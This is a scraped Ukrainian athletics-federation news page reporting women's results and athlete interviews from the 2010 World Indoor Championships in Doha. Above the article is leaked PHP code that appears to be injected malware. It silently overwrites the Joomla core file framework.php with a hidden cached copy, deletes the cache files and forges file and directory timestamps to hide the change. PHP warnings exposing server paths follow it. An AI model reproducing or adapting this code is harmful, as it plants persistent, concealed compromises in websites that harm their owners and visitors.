$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 426
Підсумки ЧЕМПІОНАТУ СВІТУ. ДОХА 2010. жінки | ФЕДЕРАЦІЯ ЛЕГКОЇ АТЛЕТИКИ УЖГОРОДА

 

 

Україна розділила 19-у позицію у
медальному заліку за підсумками
чемпіонату світу з легкої атлетики у закритих приміщеннях.
Єдину срібну медаль для України завоювала Наталія Добринська у п'ятиборств і.

Медальний залік 

1.США - 8 золотих, 3 срібних і 6 бронзових

2. Ефіопія - 3 + 0 + 2

3. Росія - 2 + 4 + 3

19. Україна - 0 + 1 + 0

Як виступили на цьому чемпіонаті наші спортсмени і що вони про це говорять :

1. 

Антоніна Єфремова
відкривала перший день чемпіонату світу в закритих приміщеннях з українських атлетів, котра стартувала в третьому забігові на 400 метрів, який був одним із найсильнішим за складом, проте найповільнішим за часом. Єфремова фінішувала четвертою з результатом  53.97 сек. і завдання мінімум не виконала.  Аби пройти до наступного кола змагань їй потрібно було бути 1-2 на фініші забігу, або добратися за чотирма результатами.

«Мені навіть нічого казати не хочеться, - констатувала роздосадувана Антоніна Єфремова після фінішу.  – Ми розраховували на потрапляння у фінал, а тут одразу після першого кола доводиться закінчувати змагання.
Якісь пояснення маєш?

Насамперед, я захворіла. Мій організм дуже чуттєвий до перепаду температур. На вулиці – справжня спека, а в готелі, а автобусах та манежі доволі прохолодно. Вчора мене прихопила страшенна ангіна, до сьогодні стан покращився, але не настільки, аби почуватися нормально. По-друге, ця доріжка мені абсолютно не підходить. Жорстке Мондо, покладене на дерев’яний поміст… У мене навіть практики бігу на таких покриттях нема. Намагаюсь проштовхнутися вперед, а мене просто кидає вгору… Та й ранковий біг завжди дається важко. Звісно, ми заздалегідь знали програму і готувалися до вранішнього забігу. Але сьогодні щось взагалі не склалося. Головою все розумієш, а ноги просто не слухаються».
1 місце  - Деббі Данн                             51,04 сек    США
2 місце  -  Тетяна Фірова                      51.13 сек    РОСІЯ
3 місце  -  Ваня Стамболова                51.50 сек   Болгарія
…18 місце – Антоніна Єфремова  53,97 сек  УКРАЇНА

 

2. Олеся Повх чемпіонка України з бігу на 60 м фінішувала третьою у своєму забігові з результатом 7.37сек вийшла до наступного кола змагань напряму. В забігові дебютантка чемпіонату світу стартувала з лідером світового сезону Лаверн Джонс-Ферретте, результат якої 7.14сек став найкращим не лише у цьому забігові, а й взагалі в першому колі короткого жіночого спринту.
«Не розумію що сталося, чи то я так засиділася на старті, чи суперниці так швидко втекли, -розповідала Олеся Звісно, я боялася зробити фальстарт, але такої стартової реакції я аж ніяк не очікувала…Щоб я, та проспала старт? У мене такого ніколи не було. Найшла де «заснути» - на чемпіонаті світу! В усякому разі я налаштовувала у півфіналі показати результат хоч трохи кращий, аніж під час попереднього забігу.
Атмосфера – супер! Бойова.»

3. Марія Ремень у забігові фінішувала п’ятою з результатом 7.46сек потрапила до півфіналу з останнім 24-им результатом.
Вихід до фіналу стандартний – 1,2 місце у полуфіналі та 2 спортсменки добираються за часом. 
У другому півфіналі  Олеся Повх стартувала поруч з лідером світового сезону Лаверн Джонс-Ферретте та легендарною Чандрою Старруп. На фініші  була сьомою з результатом 7.45сек. ( в загальному заліку стала 24).
У  третьому півфіналі Марія Ремень також фінішувала восьмою з результатом 7.41сек
(19 місце).
«Для першого разу непогано пройти до півфіналу, - говорить Марія, - Відверто кажучи, я думала, що відберуся за часом. Прогйти два кола на першому ж чемпіонаті світу – для мене величезний досвід. Ну, дива не сталося, та й рано ще, мабуть, одразу у вирішальні забіги потрапляти. До того ж, сезон у нас вийшов дуже довгим. Три з половиною місяці утримувати спортивну форму, тим паче взимку справа нелегка. Плюс почалася акліматизація. У мене сьогодні ноги, ніби свинцем налиті, великі і важкі. Таке враження, що я не півфінал на чемпіонаті світу пробігла, а складні відрізки на учбово-тренувальному зборі в Массандрі.
1 місце-  Вероника  Кэмпбелл-Браун            7,00 сек      Ямайка
2 місце  - Лаверн Джонс-Ферретте                7,03 сек      Віргінські острови        
3 місце  -  Кармеліта  Джетер                       7,05 сек      США

4.Олена Демидова також не змогла пройти кваліфікаційний бар’єр в секторі для стрибків у висоту. Однак, сама кваліфікаційна висота – 1м95см  була вже на 3 см вища за особистий рекорд  миколаївської атлетки. Олена з результатом 185см не пройшла до фінальної частини турніру стрибунок у висоту. Дев’ять учасниць подолали планку на позначці 1м92см і за загальною згодою всі виступили у фіналі.


Призери змагань:  
1.     Бланка Власич                   Хорватія   2м00см
2.     Рут Бейта                           Іспанія     1м98см
3.     Чанті Ховард-Лав               США        1м98см

5. Вікторія Рибалко , котра виконала тільки одну результативну спробу на 6м51см вийшла к кваліф. ікації з четвертим показником. Норматив проходу до фіналу, що становив 6м65см, не виконала жодна зі спортсменок, тому всі восьмеро відбиралися за результатом
У фіналі показала восьми результат  6м28см. За спробами  запоріжанка показала наступні результати: Х, 6м28см, Х, Х, 6м27см, Х.
«В принципі, це найприкріше, через що можна розчаровуватися. Я вже й не пам’ятаю, коли з подібним результатом вигравали чемпіонат світу в стрибках у довжину. Але я собою задоволена. Звісно, не результатом, а власним виступом. Участь у фіналі – це вже прогрес для мене. Мабуть, все має відбуватися поступово. Я зробила все, що могла. Медаль то хочеться, але, мабуть, не сьогодні, і не зараз. Вважатимемо, що це був мій перший крок до призових місць у майбутньому.
1. Бріттні Різ (США) - 6.70
...8. Вікторія Рибалко (Україна) - 6.28
...18. Вікторія Молчанова (Україна) - 6.13

6. Вікторія Молчанова до фіналу не пробилася. З показником 6м13см вона посіла 18-ту позицію серед 22 учасниць, обійшовши у підсумку лише атлеток із Шрі-Ланки, Філіппін та ПАР закінчила фінал на восьмій позиції з результатом 6м28см.

7. Лілія Кулик чемпіонка України з потрійного стрибка  не пройшла кваліфікацію на чемпіонаті.. В своїй найкращій спробі Ліля показала результат 13м30см, маючи найкращий показник сезону 14м06см і особистий рекорд 14м39см. Після стрибків  Лілія пройшла зі слізьми на очах не залишивши жодного коментарю з приводу свого виступу.
1 місце  -  Ольга Рипакова         15м14см             Казахстан
2 місце  -  Яргєліс Савіньє         14м86см             Куба
3 місце  -  Аня Пятих                 14м64см              Росія

 

8-9. Найбільшою несподіванкою ранкової програми першого дня чемпіонату світу в Досі став невдалий виступ наших жінок на дистанції 800 метрів.
Досвідчена Юлія Кревсун та  Наталя Лупу до фіналу не пробилися. Через те, що учасниць жіночого бігку на 800 метрів було лише 16 – організатори змагань скасували півфінали, то ж дівчата боролися одразу за вихід до вирішального забігу. Аби пройти до нього, потрібно було фінішувати у першою-другою у одному із двох забігів. Ще двоє атлеток добиралися до фіналу за часом.  
Юлія Кревсун у першому забігові фінішувала п’ятою за 2.03.91.
Наталя Лупу в другому забігові була на фініші також на п’ятій позиції – 2:04.30. У підсумку наші дівчата показали 9-ий1 і 10-ий результати відповідно. Бронзова призерка берлінського чемпіонату світу Дженніфер Медоуз вийшла до фіналу з найкращим показником 2:00.39. Закрила шістку фіналісток росіянка Євгенія Зінурова 2:03.44.

«Я намагалася зробити на фініші все можливе, але нічого не змогла вдіяти, - констатувала після фінішу Юлія Кревсун, котра на чемпіонаті світу в Берліні фінішувала на четвертій позиції. – Про тактичний прорахунок навіть мови бути не може. Я все робила правильно. Трималася в чільній групі, контролювала суперниць, але коли потрібно було спуртувати, відчула, що сил нема зовсім. Відверто кажучи, я так ще і не зрозуміла, що трапилося. Для мене – це шок.
Можливо, далася взнаки твоя хвороба?

Звісно, вона не минулася безслідно. За десять днів до чемпіонату світу я серйозно застудилася. Три дні в ліжку, п’ять днів без тренувань, температура під 39 і плюс серйозний курс антибіотиків. Звісно, я подівалася, що до чемпіонату світу я встигну відновитися, та, напевно, організм не проведеш.»

Наталка Лупу також засмутилася показаним результатом.

«Сьогодні мені було дуже складно бігти. Ноги, немов дерев’яні, - зовсім мене слухалися. При чому з самого першого метру дистанції.
1 місце  -  Марія Савінова               1.58,26        Росія
2 місце  -  Дженніфер Медоуз     1.58.43      Великобританія
3 місце  - Алісія Джонсон           1.59,60      США
…9 місце Юлія Кревсун                2.03,91       Україна
…10 місце Наталка Лупу               2.04,30       Україна

     

       

 

10. Євгенія Снігур відкривала вечірню програму першого дня чемпіонату світу забігом на 60 метрів з бар’єрами. Вихід до напівфіналу- 3 перших у забігу та 4 за кращим часом.
Снігур стартувала у другому забігові, в якому фінішувала п’ятою з результатом 7.22сек. У підсумку Женя показала аж 18-ий результат. До 16-ки півфіналісток потрапили з показником 8.15.

Одразу після забігу Євгенія Снігур, котра на минулому чемпіонаті світу в закритих приміщеннях фінішувала шостою у фіналі,  поділилася своїми враженнями і відчуттями.
«Відверто кажучи, я розраховувала показати набагато кращий час. В усякому разі, вчора на розминці у мене були прекрасні відчуття. А сьогодні ноги просто ватні.


Що сталося? Не могла заснути перед стартом?

Ні, бійці безсонням не страждають. Можливо, трохи перехвилювалася і, як кажуть спортсмени, просто перегоріла. Не можу одразу після забігу відповісти на ваші запитання і знайти причини такого виступу. Повернемося до цього після аналізу.»
1 місце  -  Лоло Джонс             7,72 сек        США     рекорд чемпіонатів
2 місце  -  Пердіта Фелісьєн     7,86   сек      Канада
3 місце  -  Прісцілла Лопес       7,77 сек       Канада

11. Наталя Добринська завоювала срібло чемпіонату світу з новим національним рекордом 4851 очко + на  останньому виді програми – бігку на 800 метрів – Наталя встановила особистий рекорд 2:14.85сек.

 

«Я дуже задоволена своїм виступом, - сяяла Наталя від щастя у мікст-зоні. – Медаль чемпіонату світу – це завжди приємно. Інша справа – хотілося б золоту. Більш того, я була готова за неї боротися, але трохи не склалося. Я думаю, що все ж таки на остаточний результат вплинув тривалий і дуже складний переліт. Доба у дорозі перед чемпіонатом світу – це занадто. Я вийшла з літака, немов робот. Ноги налилися так, що я не могла взутися навіть у кросівки. Зазвичай, один день п’ятиборства я проходжу легко і з усмішкою, можна сказати, не відчуваючи, але сьогодні вже перед стрибками у довжину я відчула шалену втому. Вже скільки років нам говорять одне й те ж, мовляв, брак коштів у міністерстві. Дякувати Люфтганзі, що ця авіакомпанія надала нам бодай якісь квитки в борг, але добовий переліт – це занадто жорстоке покарання для спортсменів, які готуються до цього чемпіонату світу, не шкодуючи сил і здоров’я.

А крім складнощів з дорогою, все нормально?

Так всі інші складнощі з цього і витікають. Не спати три ночі… Ви вважаєте це нормально для атлета? В одну ніч ми вилітали з Києва, в іншу – прилітали в Доху. Потім все ж таки вдалося трохи перепочити, а ніч перед стартом мені взагалі не вдалося очей заплющити.

І після такого ти встановлюєш новий національний рекорд??? Та ще й на 800 метрів боролася, як звір. Ну й характер, жодного очка суперницям не подаруєш!!!

Звісно, ні!!! Я навіть трохи пошкодувала, що одразу не зачепилася за Джессікою Енніс. А втім, хтозна, як би тоді склалася боротьба. Так що все добре, як воно є на цю хвилину.

З підготовкою цієї зими у тебе не було проблем?

(сміється…) Перед цим чемпіонатом світу нам дали 2000 гривень на харчування і дві пачки відновлювальних препаратів. Ми можемо це вважати складнощами? Чи це нормальна ситуація? В будь-якому разі, це все, що нам можуть запропонувати зараз в Україні… І подивіться та зрівняйте з тим, що ми бачимо в Катарі. Тільки по дорозі до арени проведення змагань можна нарахувати десяток стадіонів. Ця картина просто шокує. Аби бодай половину цих умов перекинути в Україну, то жодна країна світу не могла б навіть наблизитися до досягнень наших спортсменів!!! Я в цьому впевнена. А про таку зацікавленість найвищих осіб держави в розвитку спорту можна тільки мріяти. То ж якщо найближчим часом наш президент не зверне увагу на стан українського спорту, то все у нас розвалиться безнадійно. І про спортивне обличчя України ми будемо лише згадувати, як про фантастичний сон.»


1 місце  -
Джессіка Енніс                  ВЕЛИКОБРИТАНІЯ     4937 очок       РЕКОРД ЧЕМПІОНАТІВ
2 місце  - НАТАЛЯ ДОБРИНСЬКА    УКРАЇНА                  4851 очко       національний рекорд
3 місце  - Татьяна Чернова              РОСІЯ                       4762 очки

 

Написав Анатолій Коломоєць

 

 

 

 

 

 

 

 
ГОЛОВНА НОВИНИ новини Підсумки ЧЕМПІОНАТУ СВІТУ. ДОХА 2010. жінки
'Flauz' интернет магазин спортивного питания